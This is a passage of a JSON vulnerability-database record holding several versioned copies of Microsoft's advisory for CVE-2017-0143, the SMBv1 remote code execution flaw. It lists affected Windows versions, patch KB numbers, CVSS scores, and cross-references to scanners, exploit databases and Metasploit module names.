"KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:23", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-29T10:45:17", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3210720", "KB3212646", "KB4012215", "KB4012216", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012217", "KB4013198", "KB3177186", "KB4012212", "KB3205409", "KB4012598", "KB3205401", "KB3213986", "KB4012213", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:45:17", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-30T06:48:04", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3213986", "KB4012606", "KB4013429", "KB3177186", "KB4012598", "KBMS16-110, 3187754", "KB4012212", "KB4013198", "KB3205409", "KB4012216", "KB3212646", "KB4012215", "KB4012217", "KB3205401", "KB4012214", "KB3210721", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 